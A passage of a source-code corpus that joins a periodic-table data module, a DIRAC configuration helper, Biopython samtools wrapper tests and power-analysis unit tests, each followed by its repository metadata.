'210.0', 'At', '610.0', '575', '0.0', '0.0', 'Astatine', '0.0', '0.00', '', '0.00', '[Xe]4f14_5d10_6s2_6p5' ]), 'rn': Element([ '1.34', '1.43', '86', '-222', 'Rn', '211', '202', '9.91', '50.5', 'Radon', '0.0', '0.00', 'FCC', '0.00', '[Xe]4f14_5d10_6s2_6p6' ]), 'fr': Element([ '3.50', '2.50', '87', '-223', 'Fr', '950.0', '300.0', '0.0', '0.0', 'Francium', '0.0', '0.00', 'BCC', '0.00', '[Rn]7s1' ]), 'ra': Element([ '3.00', '2.40', '88', '226.025', 'Ra', '1809', '973', '5', '45.20', 'Radium', '0.0', '0.00', '', '0.00', '[Rn]7s2' ]), 'ac': Element([ '3.20', '2.20', '89', '227.028', 'Ac', '3473', '1323', '10.07', '22.54', 'Actinium', '0.0', '5.31', 'FCC', '0.00', '[Rn]6d1_7s2' ]), 'rf': Element([ '0.0', '0.0', '104', '-257.0', 'Rf', '0.0', '0.0', '0.0', '0.0', 'Rutherfordium', '0.0', '0.00', '', '0.00', '4-5s' ]), 'ha': Element([ '0.0', '0.0', '105', '-262.0', 'Ha', '0.0', '0.0', '0.0', '0.0', 'Hahnium', '0.0', '0.00', '', '0.00', '40s' ]), 'sq': Element([ '0.0', '0.0', '106', '-263.0', 'Sq', '0.0', '0.0', '0.0', '0.0', 'Seaborgium', '0.0', '0.00', '', '0.00', '0.9s' ]), 'ns': Element([ '0.0', '0.0', '107', '-262.0', 'Ns', '0.0', '0.0', '0.0', '0.0', 'Nielsbohrium', '0.0', '0.00', '', '0.00', '2ms' ]), 'hs': Element([ '0.0', '0.0', '108', '-264.0', 'Hs', '0.0', '0.0', '0.0', '0.0', 'Hassium', '0.0', '0.00', '', '0.00', '' ]), 'mt': Element([ '0.0', '0.0', '109', '-266', 'Mt', '0.0', '0.0', '0.0', '0.0', 'Meitnerium', '0.0', '0.00', '', '0.00', '5ms' ]), '110': Element([ '0.0', '0.0', '110', '-269', '110', '0.0', '0.0', '0.0', '0.0', '(recent_disc.)', '0.0', '0.00', '', '0.00', '' ]), '111': Element([ '0.0', '0.0', '111', '-272', '111', '0.0', '0.0', '0.0', '0.0', '(recent_disc.)', '0.0', '0.00', '', '0.00', '4/1000s' ]), '112': Element([ '0.0', 
'0.0', '112', '-277', '112', '0.0', '0.0', '0.0', '0.0', '(recent_disc.)', '0.0', '0.00', '', '0.00', '280\265s' ]), 'ce': Element([ '2.70', '1.65', '58', '140.115', 'Ce', '3699', '1071', '6.78', '20.67', 'Cerium', '-139.0', '5.16', 'FCC', '0.00', '[Xe]4f2_5d0_6s2' ]), 'pr': Element([ '2.67', '1.65', '59', '140.90765', 'Pr', '3785', '1204', '6.77', '20.8', 'Praseodymium', '-152.0', '3.67', 'HEX', '1.614', '[Xe]4f3_5d0_6s2' ]), 'nd': Element([ '2.64', '1.64', '60', '144.24', 'Nd', '3341', '1289', '7.00', '20.6', 'Neodymium', '-157.0', '3.66', 'HEX', '1.614', '[Xe]4f4_5d0_6s2' ]), 'pm': Element([ '2.62', '1.63', '61', '-145', 'Pm', '3785', '1204', '6.475', '22.39', 'Promethium', '0.0', '0.00', '', '0.00', '[Xe]4f5_5d0_6s2' ]), 'sm': Element([ '2.59', '1.62', '62', '150.36', 'Sm', '2064', '1345', '7.54', '19.95', 'Samarium', '166.0', '9.00', 'RHL', '23.22', '[Xe]4f6_5d0_6s2' ]), 'eu': Element([ '2.56', '1.85', '63', '151.965', 'Eu', '1870.0', '1090.0', '5.26', '28.9', 'Europium', '-107.0', '4.61', 'BCC', '0.00', '[Xe]4f7_5d0_6s2' ]), 'gd': Element([ '2.54', '1.61', '64', '157.25', 'Gd', '3539', '1585', '7.89', '19.9', 'Gadolinium', '-176.0', '3.64', 'HEX', '1.588', '[Xe]4f7_5d1_6s2' ]), 'tb': Element([ '2.51', '1.59', '65', '158.92534', 'Tb', '3496', '1630.0', '8.27', '19.2', 'Terbium', '-188.0', '3.60', 'HEX', '1.581', '[Xe]4f9_5d0_6s2' ]), 'dy': Element([ '2.49', '1.59', '66', '162.50', 'Dy', '2835', '1682', '8.54', '19.0', 'Dysprosium', '-186.0', '3.59', 'HEX', '1.573', '[Xe]4f10_5d0_6s2' ]), 'ho': Element([ '2.47', '1.58', '67', '164.93032', 'Ho', '2968', '1743', '8.80', '18.7', 'Holmium', '-191.0', '3.58', 'HEX', '1.570', '[Xe]4f11_5d0_6s2' ]), 'er': Element([ '2.45', '1.57', '68', '167.26', 'Er', '3136', '1795', '9.05', '18.4', 'Erbium', '-195.0', '3.56', 'HEX', '1.570', '[Xe]4f12_5d0_6s2' ]), 'tm': Element([ '2.42', '1.56', '69', '168.93421', 'Tm', '2220.0', '1818', '9.33', '18.1', 'Thulium', '-200.0', '3.54', 'HEX', '1.570', '[Xe]4f13_5d0_6s2' ]), 'yb': Element([ '2.40', '1.74', '70', '173.04', 'Yb', '1467', '1097', '6.98', '24.79', 'Ytterbium', '-118.0', '5.49', 'FCC', '0.00', '[Xe]4f14_5d0_6s2' ]), 'lu': Element([ '2.25', '1.56', '71', '174.967', 'Lu', '3668', '1936', '9.84', '17.78', 'Lutetium', '-207.0', '3.51', 'HEX', '1.585', '[Xe]4f14_5d1_6s2' ]), 'th': Element([ '3.16', '1.65', '90', '232.0381', 'Th', '5061', '2028', '11.7', '19.9', 'Thorium', '100.0', '5.08', 'FCC', '0.00', '[Rn]6d2_7s2' ]), 'pa': Element([ '3.14', '0.0', '91', '231.03588', 'Pa', '0.0', '0.0', '15.4', '15.0', 'Protactinium', '0.0', '3.92', 'TET', '0.825', '[Rn]5f2_6d1_7s2' ]), 'u': Element([ '3.11', '1.42', '92', '238.0289', 'U', '4407', '1405', '18.90', '12.59', 'Uranium', '-210.0', '2.85', 'ORC', '0.00', '[Rn]5f3_6d1_7s2' ]), 'np': Element([ '3.08', '0.0', '93', '237.048', 'Np', '0.0', '910.0', '20.4', '11.62', 'Neptunium', '-188.0', '4.72', 'ORC', '0.00', '[Rn]5f4_6d1_7s2' ]), 'pu': Element([ '3.05', '0.0', '94', '-244', 'Pu', '3503', '913', '19.8', '12.32', 'Plutonium', '-150.0', '0.00', 'MCL', '0.00', '[Rn]5f6_6d0_7s2' ]), 'am': Element([ '3.02', '0.0', '95', '-243', 'Am', '2880.0', '1268', '13.6', '17.86', 'Americium', '0.0', '0.00', '', '0.00', '[Rn]5f7_6d0_7s2' ]), 'cm': Element([ '2.99', '0.0', '96', '-247', 'Cm', '0.0', '1340.0', '13.511', '18.28', 'Curium', '0.0', '0.00', '', '0.00', '[Rn]5f7_6d1_7s2' ]), 'bk': Element([ '2.97', '0.0', '97', '-247', 'Bk', '0.0', '0.0', '0.0', '0.0', 'Berkelium', '0.0', '0.00', '', '0.00', '[Rn]5f8_6d1_7s2' ]), 'cf': Element([ '2.95', '0.0', '98', '-251', 'Cf', 
'0.0', '900.0', '0.0', '0.0', 'Californium', '0.0', '0.00', '', '0.00', '[Rn]5f10_6d0_7s2' ]), 'es': Element([ '2.92', '0.0', '99', '-252', 'Es', '0.0', '0.0', '0.0', '0.0', 'Einsteinium', '0.0', '0.00', '', '0.00', '[Rn]5f11_6d0_7s2' ]), 'fm': Element([ '2.90', '0.0', '100', '-257', 'Fm', '0.0', '0.0', '0.0', '0.0', 'Fermium', '0.0', '0.00', '', '0.00', '[Rn]5f12_6d0_7s2' ]), 'md': Element([ '2.87', '0.0', '101', '-258', 'Md', '0.0', '0.0', '0.0', '0.0', 'Mendelevium', '0.0', '0.00', '', '0.00', '[Rn]5f13_6d0_7s2' ]), 'no': Element([ '2.85', '0.0', '102', '-259', 'No', '0.0', '0.0', '0.0', '0.0', 'Nobelium', '0.0', '0.00', '', '0.00', '[Rn]5f14_6d0_7s2' ]), 'lr': Element([ '2.82', '0.0', '103', '-260', 'Lr', '0.0', '0.0', '0.0', '0.0', 'Lawrencium', '0.0', '0.00', '', '0.00', '[Rn]5f14_6d1_7s2' ]), 'none': Element([ '0.0', '0.0', '0', '0', 'None', '0.0', '0.0', '0.0', '0.0', 'None', '0.0', '0.00', '', '0.00', '-' ]), 'x': Element([ '0.0', '0.0', '0', '0', 'X', '0.0', '0.0', '0.0', '0.0', 'X', '0.0', '0.00', '', '0.00', '-' ]), 'q': Element([ '0.0', '0.0', '0', '0', 'Q', '0.0', '0.0', '0.0', '0.0', 'Q', '0.0', '0.00', '', '0.00', '-' ]) }) PeriodicTableByName = PeriodicTable PeriodicTableByZ = OrderedDict( { 32: PeriodicTableByName["ge"], 64: PeriodicTableByName["gd"], 31: PeriodicTableByName["ga"], 57: PeriodicTableByName["la"], 3: PeriodicTableByName["li"], 81: PeriodicTableByName["tl"], 69: PeriodicTableByName["tm"], 103: PeriodicTableByName["lr"], 90: PeriodicTableByName["th"], 22: PeriodicTableByName["ti"], 52: PeriodicTableByName["te"], 65: PeriodicTableByName["tb"], 43: PeriodicTableByName["tc"], 73: PeriodicTableByName["ta"], 70: PeriodicTableByName["yb"], 0: PeriodicTableByName["none"], 66: PeriodicTableByName["dy"], 54: PeriodicTableByName["xe"], 1: PeriodicTableByName["h"], 15: PeriodicTableByName["p"], 0: PeriodicTableByName["x"], 30: PeriodicTableByName["zn"], 111: PeriodicTableByName["111"], 110: PeriodicTableByName["110"], 112: PeriodicTableByName["112"], 63: PeriodicTableByName["eu"], 40: PeriodicTableByName["zr"], 68: PeriodicTableByName["er"], 44: PeriodicTableByName["ru"], 75: PeriodicTableByName["re"], 104: PeriodicTableByName["rf"], 88: PeriodicTableByName["ra"], 37: PeriodicTableByName["rb"], 86: PeriodicTableByName["rn"], 45: PeriodicTableByName["rh"], 4: PeriodicTableByName["be"], 56: PeriodicTableByName["ba"], 83: PeriodicTableByName["bi"], 97: PeriodicTableByName["bk"], 35: PeriodicTableByName["br"], 6: PeriodicTableByName["c"], 19: PeriodicTableByName["k"], 8: PeriodicTableByName["o"], 16: PeriodicTableByName["s"], 74: PeriodicTableByName["w"], 76: PeriodicTableByName["os"], 27: PeriodicTableByName["co"], 96: PeriodicTableByName["cm"], 17: PeriodicTableByName["cl"], 20: PeriodicTableByName["ca"], 91: PeriodicTableByName["pa"], 98: PeriodicTableByName["cf"], 58: PeriodicTableByName["ce"], 48: PeriodicTableByName["cd"], 55: PeriodicTableByName["cs"], 24: PeriodicTableByName["cr"], 29: PeriodicTableByName["cu"], 59: PeriodicTableByName["pr"], 78: PeriodicTableByName["pt"], 94: PeriodicTableByName["pu"], 82: PeriodicTableByName["pb"], 71: PeriodicTableByName["lu"], 46: PeriodicTableByName["pd"], 84: PeriodicTableByName["po"], 61: PeriodicTableByName["pm"], 108: PeriodicTableByName["hs"], 67: PeriodicTableByName["ho"], 105: PeriodicTableByName["ha"], 72: PeriodicTableByName["hf"], 80: PeriodicTableByName["hg"], 2: PeriodicTableByName["he"], 101: PeriodicTableByName["md"], 12: PeriodicTableByName["mg"], 5: PeriodicTableByName["b"], 9: PeriodicTableByName["f"], 42: 
PeriodicTableByName["mo"], 25: PeriodicTableByName["mn"], 7: PeriodicTableByName["n"], 109: PeriodicTableByName["mt"], 23: PeriodicTableByName["v"], 89: PeriodicTableByName["ac"], 47: PeriodicTableByName["ag"], 77: PeriodicTableByName["ir"], 95: PeriodicTableByName["am"], 13: PeriodicTableByName["al"], 33: PeriodicTableByName["as"], 18: PeriodicTableByName["ar"], 79: PeriodicTableByName["au"], 85: PeriodicTableByName["at"], 49: PeriodicTableByName["in"], 28: PeriodicTableByName["ni"], 102: PeriodicTableByName["no"], 11: PeriodicTableByName["na"], 41: PeriodicTableByName["nb"], 60: PeriodicTableByName["nd"], 10: PeriodicTableByName["ne"], 99: PeriodicTableByName["es"], 93: PeriodicTableByName["np"], 107: PeriodicTableByName["ns"], 87: PeriodicTableByName["fr"], 21: PeriodicTableByName["sc"], 26: PeriodicTableByName["fe"], 100: PeriodicTableByName["fm"], 53: PeriodicTableByName["i"], 38: PeriodicTableByName["sr"], 106: PeriodicTableByName["sq"], 0: PeriodicTableByName["q"], 36: PeriodicTableByName["kr"], 14: PeriodicTableByName["si"], 92: PeriodicTableByName["u"], 50: PeriodicTableByName["sn"], 62: PeriodicTableByName["sm"], 39: PeriodicTableByName["y"], 51: PeriodicTableByName["sb"], 34: PeriodicTableByName["se"], } ) def main(): print("PeriodicTableByZ = {") for k, v in PeriodicTableByName.items(): print("{:d} : PeriodicTableByName['{:s}'],".format(v.Z, k)) print("}") if __name__ == "__main__": main()
MRChemSoft/mrchem
python/mrchem/periodictable.py
Python
lgpl-3.0
27,216
[ "CRYSTAL" ]
a90a3a0d7624c196f0e9707499cdf3bdde2ed030346ba6f5723f38f5aafceed9
######################################################################## # File : ResourcesDefaults.py # Author : Ricardo Graciani ######################################################################## """ Some Helper class to access Default options for Different Resources (CEs, SEs, Catalags,...) """ from __future__ import print_function from __future__ import absolute_import from __future__ import division from diraccfg import CFG from DIRAC.ConfigurationSystem.Client.Helpers.Path import cfgResourceSection, cfgPath, cfgInstallPath, cfgPathToList __RCSID__ = "$Id$" def defaultSection(resource): """ Build the path for the Defaults section """ return cfgPath(cfgResourceSection, 'Defaults', resource) def getComputingElementDefaults(ceName='', ceType='', cfg=None, currentSectionPath=''): """ Return cfgDefaults with defaults for the given CEs defined either in arguments or in the provided cfg """ cesCfg = CFG() if cfg: try: cesCfg.loadFromFile(cfg) cesPath = cfgInstallPath('ComputingElements') if cesCfg.isSection(cesPath): for section in cfgPathToList(cesPath): cesCfg = cesCfg[section] except Exception: return CFG() # Overwrite the cfg with Command line arguments if ceName: if not cesCfg.isSection(ceName): cesCfg.createNewSection(ceName) if currentSectionPath: # Add Options from Command Line optionsDict = __getExtraOptions(currentSectionPath) for name, value in optionsDict.items(): cesCfg[ceName].setOption(name, value) # pylint: disable=no-member if ceType: cesCfg[ceName].setOption('CEType', ceType) # pylint: disable=no-member ceDefaultSection = cfgPath(defaultSection('ComputingElements')) # Load Default for the given type from Central configuration is defined ceDefaults = __gConfigDefaults(ceDefaultSection) for ceName in cesCfg.listSections(): if 'CEType' in cesCfg[ceName]: ceType = cesCfg[ceName]['CEType'] if ceType in ceDefaults: for option in ceDefaults[ceType].listOptions(): # pylint: disable=no-member if option not in cesCfg[ceName]: cesCfg[ceName].setOption(option, ceDefaults[ceType][option]) # pylint: disable=unsubscriptable-object return cesCfg def __gConfigDefaults(defaultPath): """ Build a cfg from a Default Section """ from DIRAC import gConfig cfgDefaults = CFG() result = gConfig.getSections(defaultPath) if not result['OK']: return cfgDefaults for name in result['Value']: typePath = cfgPath(defaultPath, name) cfgDefaults.createNewSection(name) result = gConfig.getOptionsDict(typePath) if result['OK']: optionsDict = result['Value'] for option, value in optionsDict.items(): cfgDefaults[name].setOption(option, value) return cfgDefaults def __getExtraOptions(currentSectionPath): from DIRAC import gConfig optionsDict = {} if not currentSectionPath: return optionsDict result = gConfig.getOptionsDict(currentSectionPath) if not result['OK']: return optionsDict print(result) return result['Value']
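
# Illustrative sketch (hedged): the CE name and type below are hypothetical,
# and merging in central defaults requires a configured gConfig, so results
# vary by installation:
#
#     cesCfg = getComputingElementDefaults(ceName='MyCE', ceType='InProcess')
#     cesCfg['MyCE']['CEType']  # -> 'InProcess'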
yujikato/DIRAC
src/DIRAC/ConfigurationSystem/Client/Helpers/ResourcesDefaults.py
Python
gpl-3.0
3,129
[ "DIRAC" ]
98b38ce9dcfc2daecaf9c14416e351406261a66aca8665c61da4405bbc67200a
# Copyright 2014 by Saket Choudhary. Based on test_Clustalw_tool.py by Peter # Cock . # # This code is part of the Biopython distribution and governed by its # license. Please see the LICENSE file that should have been included # as part of this package. # Last Checked with samtools [0.1.18 (r982:295)] from Bio import MissingExternalDependencyError import sys import os import unittest from Bio.Sequencing.Applications import SamtoolsViewCommandline from Bio.Sequencing.Applications import SamtoolsCalmdCommandline from Bio.Sequencing.Applications import SamtoolsCatCommandline from Bio.Sequencing.Applications import SamtoolsFaidxCommandline from Bio.Sequencing.Applications import SamtoolsIdxstatsCommandline from Bio.Sequencing.Applications import SamtoolsIndexCommandline from Bio.Sequencing.Applications import SamtoolsMergeCommandline from Bio.Sequencing.Applications import SamtoolsMpileupCommandline from Bio.Sequencing.Applications import SamtoolsSortCommandline # TODO from Bio.Sequencing.Applications import SamtoolsPhaseCommandline # TODO from Bio.Sequencing.Applications import SamtoolsReheaderCommandline # TODO from Bio.Sequencing.Applications import SamtoolsRmdupCommandline # TODO from Bio.Sequencing.Applications import SamtoolsTargetcutCommandline # TODO from Bio.Sequencing.Applications import SamtoolsFixmateCommandline ################################################################# # Try to avoid problems when the OS is in another language os.environ['LANG'] = 'C' samtools_exe = None if sys.platform == "win32": # TODO - Check the path? try: # This can vary depending on the Windows language. prog_files = os.environ["PROGRAMFILES"] except KeyError: prog_files = r"C:\Program Files" # By default tries C:\Program Files\samtools\samtools.exe # or C:\Program Files\samtools.exe was chosen likely_dirs = ["samtools", ""] likely_exes = ["samtools.exe"] for folder in likely_dirs: if os.path.isdir(os.path.join(prog_files, folder)): for filename in likely_exes: if os.path.isfile(os.path.join(prog_files, folder, filename)): samtools_exe = os.path.join(prog_files, folder, filename) break if samtools_exe: break else: from Bio._py3k import getoutput output = getoutput("samtools") # Since "not found" may be in another language, try and be sure this is # really the samtools tool's output if ("not found" not in output and "samtools (Tools for alignments in the SAM format)" in output): samtools_exe = "samtools" if not samtools_exe: raise MissingExternalDependencyError( """Install samtools and correctly set the file path to the program if you want to use it from Biopython""") class SamtoolsTestCase(unittest.TestCase): """Class for implementing Samtools test cases.""" def setUp(self): self.files_to_clean = set() self.samfile1 = os.path.join(os.path.dirname(os.path.abspath(__file__)), "SamBam", "sam1.sam") self.reference = os.path.join(os.path.dirname(os.path.abspath(__file__)), "BWA", "human_g1k_v37_truncated.fasta") self.referenceindexfile = os.path.join(os.path.dirname(os.path.abspath(__file__)), "BWA", "human_g1k_v37_truncated.fasta.fai") self.samfile2 = os.path.join(os.path.dirname(os.path.abspath(__file__)), "SamBam", "sam2.sam") self.bamfile1 = os.path.join(os.path.dirname(os.path.abspath(__file__)), "SamBam", "bam1.bam") self.bamfile2 = os.path.join(os.path.dirname(os.path.abspath(__file__)), "SamBam", "bam2.bam") self.outsamfile = os.path.join(os.path.dirname(os.path.abspath(__file__)), "SamBam", "out.sam") self.outbamfile = os.path.join(os.path.dirname(os.path.abspath(__file__)), "SamBam", "out.bam") 
self.bamindexfile1 = os.path.join(os.path.dirname(os.path.abspath(__file__)), "SamBam", "bam1.bam.bai") self.files_to_clean = [self.referenceindexfile, self.bamindexfile1, self.outbamfile] def tearDown(self): for filename in self.files_to_clean: if os.path.isfile(filename): os.remove(filename) def test_view(self): """Test for samtools view""" cmdline = SamtoolsViewCommandline(samtools_exe) cmdline.set_parameter("input_file", self.bamfile1) stdout_bam, stderr_bam = cmdline() self.assertTrue(stderr_bam.startswith(""), "SAM file viewing failed: \n%s\nStdout:%s" % (cmdline, stdout_bam)) cmdline.set_parameter("input_file", self.samfile1) cmdline.set_parameter("S", True) stdout_sam, stderr_sam = cmdline() self.assertTrue( stderr_sam.startswith("[samopen] SAM header is present:"), "SAM file viewing failed:\n%s\nStderr:%s" % (cmdline, stderr_sam)) def create_fasta_index(self): """Creates index for reference fasta sequence.""" cmdline = SamtoolsFaidxCommandline(samtools_exe) cmdline.set_parameter("reference", self.reference) stdout, stderr = cmdline() def create_bam_index(self, input_bam): """Creates index of an input bam file""" cmdline = SamtoolsIndexCommandline(samtools_exe) cmdline.set_parameter("input_bam", input_bam) stdout, stderr = cmdline() def test_faidx(self): cmdline = SamtoolsFaidxCommandline(samtools_exe) cmdline.set_parameter("reference", self.reference) stdout, stderr = cmdline() self.assertFalse(stderr, "Samtools faidx failed:\n%s\nStderr:%s" % (cmdline, stderr)) self.assertTrue(os.path.isfile(self.referenceindexfile)) def test_calmd(self): """Test for samtools calmd""" self.create_fasta_index() cmdline = SamtoolsCalmdCommandline(samtools_exe) cmdline.set_parameter("reference", self.reference) cmdline.set_parameter("input_bam", self.bamfile1) # If there is no index file for the reference # samtools calmd creates one at the time of calling if os.path.exists(self.referenceindexfile): # print("exists") stderr_calmd_expected = "" else: # print("doesnt exist") stderr_calmd_expected = "[fai_load] build FASTA index.\n" stdout, stderr = cmdline() self.assertEqual(stderr, stderr_calmd_expected) def test_cat(self): cmdline = SamtoolsCatCommandline(samtools_exe) cmdline.set_parameter("o", self.outbamfile) cmdline.set_parameter("input_bam", [self.bamfile1, self.bamfile2]) stdout, stderr = cmdline() self.assertEqual(stderr, "") # TODO: def test_fixmate(self): def test_sort(self): cmdline = SamtoolsSortCommandline(samtools_exe) cmdline.set_parameter("input_bam", self.bamfile1) cmdline.set_parameter("out_prefix", "SamBam/out") stdout, stderr = cmdline() self.assertFalse(stderr, "Samtools sort failed:\n%s\nStderr:%s" % (cmdline, stderr)) def test_index(self): cmdline = SamtoolsIndexCommandline(samtools_exe) cmdline.set_parameter("input_bam", self.bamfile1) stdout, stderr = cmdline() self.assertFalse(stderr, "Samtools index failed:\n%s\nStderr:%s" % (cmdline, stderr)) self.assertTrue(os.path.exists(self.bamindexfile1)) def test_idxstats(self): self.create_bam_index(self.bamfile1) cmdline = SamtoolsIdxstatsCommandline(samtools_exe) cmdline.set_parameter("input_bam", self.bamfile1) stdout, stderr = cmdline() self.assertFalse(stderr, "Samtools idxstats failed:\n%s\nStderr:%s" % (cmdline, stderr)) def test_merge(self): cmdline = SamtoolsMergeCommandline(samtools_exe) cmdline.set_parameter("input_bam", [self.bamfile1, self.bamfile2]) cmdline.set_parameter("out_bam", self.outbamfile) cmdline.set_parameter("f", True) # Overwrite out.bam if it exists stdout, stderr = cmdline() self.assertFalse(stderr, 
"Samtools merge failed:\n%s\nStderr:%s" % (cmdline, stderr)) self.assertTrue(os.path.exists(self.outbamfile)) def test_mpileup(self): cmdline = SamtoolsMpileupCommandline(samtools_exe) cmdline.set_parameter("input_file", [self.bamfile1]) stdout, stderr = cmdline() self.assertFalse("[bam_pileup_core]" in stdout) def test_mpileup_list(self): cmdline = SamtoolsMpileupCommandline(samtools_exe) cmdline.set_parameter("input_file", [self.bamfile1, self.bamfile2]) stdout, stderr = cmdline() self.assertFalse("[bam_pileup_core]" in stdout) # TODO: def test_phase(self): # TODO: def test_reheader(self): # TODO: def test_rmdup(self): # TODO: def test_targetcut(self): if __name__ == "__main__": runner = unittest.TextTestRunner(verbosity=2) unittest.main(testRunner=runner)
updownlife/multipleK
dependencies/biopython-1.65/Tests/test_samtools_tool.py
Python
gpl-2.0
9,966
[ "BWA", "Biopython" ]
3949e0682985a8c7d108543101be47b5fc375b595ac29574a202e9b06812d080
# ----------------------------------------------------------------------------
# Copyright (c) 2013--, scikit-bio development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
# ----------------------------------------------------------------------------

from unittest import TestCase, main

import numpy as np
import numpy.testing as npt
from scipy.stats import kruskal

from machivellian.power import (subsample_power,
                                confidence_bound,
                                _calculate_power,
                                _compare_distributions,
                                _check_subsample_power_inputs,
                                )


class PowerAnalysisTest(TestCase):

    def setUp(self):
        def f(x):
            """returns the p value of a kruskal wallis test"""
            return kruskal(*x)[1]

        self.f = f
        self.num_p = 1

        # Sets the random seed
        np.random.seed(5)
        # Sets up the distributions of data for use
        self.s1 = np.arange(0, 10, 1)
        # Sets up two distributions which will never be equal by a rank-sum
        # test.
        self.samps = [np.ones((10))/10., np.ones((10))]
        self.pop = [np.arange(0, 10, 0.1), np.arange(0, 20, 0.2)]
        self.counts = np.array([5, 15, 25, 35, 45])
        # Sets up a vector of alpha values
        self.alpha = np.power(10, np.array([-1, -1.301, -2, -3])).round(3)

    def test_subsample_power_defaults(self):
        test_p = subsample_power(self.f, self.pop, self.counts,
                                 num_iter=10, num_runs=5)
        self.assertEqual(test_p.shape, (5, 5))

    def test_subsample_power_matches(self):
        test_p = subsample_power(self.f,
                                 samples=self.pop,
                                 counts=self.counts,
                                 num_iter=10,
                                 num_runs=5,
                                 draw_mode="matched")
        self.assertEqual(test_p.shape, (5, 5))

    def test_subsample_power_multi_p(self):
        test_p = subsample_power(lambda x: np.array([0.5, 0.5]),
                                 samples=self.pop,
                                 counts=self.counts,
                                 num_iter=10,
                                 num_runs=5)
        self.assertEqual(test_p.shape, (5, 5, 2))

    def test_subsample_power_kwargs(self):
        def test(x, b=True):
            if b:
                return self.f(x)
            else:
                return np.array([self.f(x)] * 2)

        test_p_bt = subsample_power(test,
                                    samples=self.pop,
                                    counts=self.counts,
                                    num_iter=10,
                                    num_runs=5,
                                    test_kwargs={'b': True})
        test_p_bf = subsample_power(test,
                                    samples=self.pop,
                                    counts=self.counts,
                                    num_iter=10,
                                    num_runs=5,
                                    test_kwargs={'b': False})
        self.assertEqual(test_p_bt.shape, (5, 5))
        self.assertEqual(test_p_bf.shape, (5, 5, 2))

    def test_confidence_bound_default(self):
        # Sets the known confidence bound
        known = 2.2830070
        test = confidence_bound(self.s1)
        npt.assert_almost_equal(test, known, 3)

    def test_confidence_bound_df(self):
        known = 2.15109
        test = confidence_bound(self.s1, df=15)
        npt.assert_almost_equal(known, test, 3)

    def test_confidence_bound_alpha(self):
        known = 3.2797886
        test = confidence_bound(self.s1, alpha=0.01)
        npt.assert_almost_equal(known, test, 3)

    def test_confidence_bound_nan(self):
        # Sets the value to test
        samples = np.array([[4, 3.2, 3.05],
                            [2, 2.8, 2.95],
                            [5, 2.9, 3.07],
                            [1, 3.1, 2.93],
                            [3, np.nan, 3.00]])
        # Sets the known value
        known = np.array([2.2284, 0.2573, 0.08573])
        # Tests the function
        test = confidence_bound(samples, axis=0)
        npt.assert_almost_equal(known, test, 3)

    def test_confidence_bound_axis_none(self):
        # Sets the value to test
        samples = np.array([[4, 3.2, 3.05],
                            [2, 2.8, 2.95],
                            [5, 2.9, 3.07],
                            [1, 3.1, 2.93],
                            [3, np.nan, 3.00]])
        # Sets the known value
        known = 0.52852
        # Tests the output
        test = confidence_bound(samples, axis=None)
        npt.assert_almost_equal(known, test, 3)

    def test_calculate_power_numeric(self):
        # Sets up the values to test
        crit = 0.025
        # Sets the known value
        known = 0.5
        # Calculates the test value
        test = _calculate_power(p_values=self.alpha,
                                alpha=crit,
                                numeric=True)
        # Checks the test value
        npt.assert_almost_equal(known, test)

    def test_calculate_power_reject(self):
        crit = 0.025
        reject = self.alpha < crit
        known = 0.5
        test = _calculate_power(p_values=reject,
                                alpha=crit,
                                numeric=False)
        npt.assert_almost_equal(known, test)

    def test_calculate_power_n(self):
        crit = 0.025
        known = np.array([0.5, 0.5])
        alpha = np.vstack((self.alpha, self.alpha))
        test = _calculate_power(alpha, crit)
        npt.assert_almost_equal(known, test)

    def test_compare_distributions_all_mode(self):
        known = np.ones((100))*0.0026998
        test = _compare_distributions(self.f, self.samps, 1,
                                      num_iter=100)
        npt.assert_allclose(known, test, 5)

    def test_compare_distributions_matched_mode(self):
        # Sets the known value
        known_mean = 0.162195
        known_std = 0.121887
        known_shape = (100,)
        # Tests the sample value
        test = _compare_distributions(self.f, self.pop, self.num_p,
                                      mode='matched', num_iter=100,
                                      bootstrap=False)
        npt.assert_allclose(known_mean, test.mean(), rtol=0.1, atol=0.02)
        npt.assert_allclose(known_std, test.std(), rtol=0.1, atol=0.02)
        self.assertEqual(known_shape, test.shape)

    def test_compare_distributions_multiple_returns(self):
        known = np.array([[1, 1, 1], [2, 2, 2], [3, 3, 3]])

        def f(x):
            return np.array([1, 2, 3])

        test = _compare_distributions(f, self.pop, 3, mode='matched',
                                      num_iter=3, bootstrap=False)
        npt.assert_array_equal(known, test)

    def test_compare_distributions_bootstrap_more(self):
        known = np.array([-76.10736642, -82.08492357, -74.45798197,
                          -72.0498448, -82.54530595])
        test = _compare_distributions(self.f, self.pop, self.num_p,
                                      counts=1000,
                                      num_iter=5)
        npt.assert_almost_equal(known, np.log10(test), 5)

    def test_check_subsample_power_inputs_draw_mode_error(self):
        with self.assertRaises(ValueError):
            _check_subsample_power_inputs(test=self.f,
                                          samples=[np.ones((2)), np.ones((5))],
                                          counts=self.counts,
                                          draw_mode="Alice Price Healy")

    def test_check_subsample_power_inputs_matched_mode(self):
        with self.assertRaises(ValueError):
            _check_subsample_power_inputs(test=self.f,
                                          samples=[np.ones((2)), np.ones((5))],
                                          counts=self.counts,
                                          draw_mode="matched")

    def test_check_subsample_power_inputs_low_counts(self):
        with self.assertRaises(ValueError):
            _check_subsample_power_inputs(test=self.f,
                                          samples=self.samps,
                                          counts=np.arange(-5, 0))

    def test_check_subsample_power_inputs_bootstrap_counts(self):
        with self.assertRaises(ValueError):
            _check_subsample_power_inputs(test=self.f,
                                          samples=[np.ones((3)), np.ones((5))],
                                          counts=self.counts,
                                          bootstrap=False)

    def test_check_subsample_power_inputs_ratio(self):
        with self.assertRaises(ValueError):
            _check_subsample_power_inputs(test=self.f,
                                          samples=self.samps,
                                          counts=self.counts,
                                          ratio=np.array([1, 2, 3]))

    def test_check_subsample_power_inputs_test(self):
        # Defines a test function
        def test(x):
            return 'Hello World!'
        with self.assertRaises(TypeError):
            _check_subsample_power_inputs(test=test,
                                          samples=self.samps,
                                          counts=self.counts)

    def test_check_subsample_power_inputs_bootstrap_error(self):
        with self.assertRaises(ValueError):
            _check_subsample_power_inputs(test=self.f,
                                          samples=self.samps,
                                          counts=np.arange(10, 1000, 10),
                                          bootstrap=False)

    def test_check_sample_power_inputs(self):
        # Defines the known returns
        known_num_p = 1
        known_ratio = np.ones((2))
        # Runs the code for the returns
        test_ratio, test_num_p = \
            _check_subsample_power_inputs(test=self.f,
                                          samples=self.samps,
                                          counts=self.counts,
                                          )
        # Checks the returns are sane
        self.assertEqual(known_num_p, test_num_p)
